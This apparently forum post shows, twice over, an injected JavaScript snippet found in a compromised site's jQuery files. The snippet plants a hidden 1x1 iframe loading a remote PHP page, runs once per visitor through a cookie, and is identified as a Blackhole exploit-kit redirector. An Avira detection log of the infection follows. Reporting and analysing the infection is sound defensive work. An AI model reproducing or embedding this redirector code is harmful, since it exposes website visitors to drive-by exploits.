- function zzzfff() {
- var bxac = document.createElement('iframe');
- bxac.src = 'http://clinicalaserna.es/imagenes/mrb8F9tf.php';
- bxac.style.position = 'absolute';
- bxac.style.border = '0';
- bxac.style.height = '1px';
- bxac.style.width = '1px';
- bxac.style.left = '1px';
- bxac.style.top = '1px';
- if (!document.getElementById('bxac')) {
- document.write('<div id=\'bxac\'></div>');
- document.getElementById('bxac').appendChild(bxac);
- }
- }
- function SetCookie(cookieName, cookieValue, nDays, path) {
- var today = new Date();
- var expire = new Date();
- if (nDays == null || nDays == 0) nDays = 1;
- expire.setTime(today.getTime() + 3600000 * 24 * nDays);
- document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
- }
- function GetCookie(name) {
- var start = document.cookie.indexOf(name + "=");
- var len = start + name.length + 1;
- if ((!start) && (name != document.cookie.substring(0, name.length))) {
- return null;
- }
- if (start == -1) return null;
- var end = document.cookie.indexOf(";", len);
- if (end == -1) end = document.cookie.length;
- return unescape(document.cookie.substring(len, end));
- }
- if (navigator.cookieEnabled) {
- if (GetCookie('visited_uq') == 55) {} else {
- SetCookie('visited_uq', '55', '1', '/');
- zzzfff();
- }
- }
复制代码
- function zzzfff() {
- var kdg = document.createElement('iframe');
- kdg.src = 'http://clinicalaserna.es/imagenes/mrb8F9tf.php';
- kdg.style.position = 'absolute';
- kdg.style.border = '0';
- kdg.style.height = '1px';
- kdg.style.width = '1px';
- kdg.style.left = '1px';
- kdg.style.top = '1px';
- if (!document.getElementById('kdg')) {
- document.write('<div id=\'kdg\'></div>');
- document.getElementById('kdg').appendChild(kdg);
- }
- }
- function SetCookie(cookieName, cookieValue, nDays, path) {
- var today = new Date();
- var expire = new Date();
- if (nDays == null || nDays == 0) nDays = 1;
- expire.setTime(today.getTime() + 3600000 * 24 * nDays);
- document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
- }
- function GetCookie(name) {
- var start = document.cookie.indexOf(name + "=");
- var len = start + name.length + 1;
- if ((!start) && (name != document.cookie.substring(0, name.length))) {
- return null;
- }
- if (start == -1) return null;
- var end = document.cookie.indexOf(";", len);
- if (end == -1) end = document.cookie.length;
- return unescape(document.cookie.substring(len, end));
- }
- if (navigator.cookieEnabled) {
- if (GetCookie('visited_uq') == 55) {} else {
- SetCookie('visited_uq', '55', '1', '/');
- zzzfff();
- }
- }
复制代码
Avira
2013/9/5 上午 06:02 [System Scanner] 掃描
掃描結束 [已完成全部的掃描。]。
檔案數: 803
目錄數: 0
惡意程式碼數: 1
警告數: 0
2013/9/5 上午 06:02 [System Scanner] 發現惡意程式碼
檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\AVC3APW1\base[1].js'
包含病毒或有害的程式 'JS/BlacoleRef.DD.36' [virus]
已採取動作:
檔案會移動至 '548f03de.qua' 名稱底下的隔離區目錄。.
2013/9/5 上午 06:02 [System Scanner] 發現惡意程式碼
檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\TIHYMAU3\jquery-ui-1.8.12.custom.min[1].js'
包含病毒或有害的程式 'JS/BlacoleRef.DD.36' [virus]
已採取動作:
檔案會移動至 '54ea0c1e.qua' 名稱底下的隔離區目錄。.
2013/9/5 上午 06:02 [System Scanner] 掃描
掃描結束 [已完成全部的掃描。]。
檔案數: 804
目錄數: 0
惡意程式碼數: 2
警告數: 0
2013/9/5 上午 06:02 [System Scanner] 發現惡意程式碼
檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\MDC6X2XG\jquery.lightbox-0.5[1].js'
包含病毒或有害的程式 'JS/BlacoleRef.DD.36' [virus]
已採取動作:
檔案會移動至 '4c7d23b9.qua' 名稱底下的隔離區目錄。.
2013/9/5 上午 06:00 [Real-Time Protection] 發現惡意程式碼
在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\TIHYMAU3\jquery-ui-1.8.12.custom.min[1].js 中
偵測到病毒或有害的程式 'JS/BlacoleRef.DD.36 [virus]'
執行的動作:傳輸至掃描程式
2013/9/5 上午 05:59 [Real-Time Protection] 發現惡意程式碼
在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\MDC6X2XG\jquery.lightbox-0.5[1].js 中
偵測到病毒或有害的程式 'JS/BlacoleRef.DD.36 [virus]'
執行的動作:傳輸至掃描程式
2013/9/5 上午 05:59 [Real-Time Protection] 發現惡意程式碼
在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\TIHYMAU3\jquery-ui-1.8.12.custom.min[1].js 中
偵測到病毒或有害的程式 'JS/BlacoleRef.DD.36 [virus]'
執行的動作:拒絕存取
2013/9/5 上午 05:59 [Web Protection] 發現惡意程式碼
從 URL "http://titolari.cartapremiasassari.it/JS/jquery-ui-1.8.12.custom.min.js"
存取資料時,
發現病毒或有害的程式 'JS/BlacoleRef.DD.36' [virus]。
已採取動作:已略過
2013/9/5 上午 05:59 [Real-Time Protection] 發現惡意程式碼
在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\AVC3APW1\base[1].js 中
偵測到病毒或有害的程式 'JS/BlacoleRef.DD.36 [virus]'
執行的動作:拒絕存取
2013/9/5 上午 05:59 [Real-Time Protection] 發現惡意程式碼
在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\AVC3APW1\base[1].js 中
偵測到病毒或有害的程式 'JS/BlacoleRef.DD.36 [virus]'
執行的動作:傳輸至掃描程式
2013/9/5 上午 05:59 [Web Protection] 發現惡意程式碼
從 URL "http://titolari.cartapremiasassari.it/JS/jquery.lightbox-0.5.js" 存取資料時,
發現病毒或有害的程式 'JS/BlacoleRef.DD.36' [virus]。
已採取動作:已略過
2013/9/5 上午 05:59 [Web Protection] 發現惡意程式碼
從 URL "http://titolari.cartapremiasassari.it/JS/base.js" 存取資料時,
發現病毒或有害的程式 'JS/BlacoleRef.DD.36' [virus]。
已採取動作:已略過
2013/9/5 上午 05:59 [Real-Time Protection] 發現惡意程式碼
在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
Files\Low\Content.IE5\25HCCZL4\titolari_cartapremiasassari_it[1].htm 中
偵測到病毒或有害的程式 'JS/BlacoleRef.DD.36 [virus]'
執行的動作:拒絕存取
2013/9/5 上午 05:59 [Web Protection] 發現惡意程式碼
從 URL "http://titolari.cartapremiasassari.it/" 存取資料時,
發現病毒或有害的程式 'JS/BlacoleRef.DD.36' [virus]。
已採取動作:已略過
|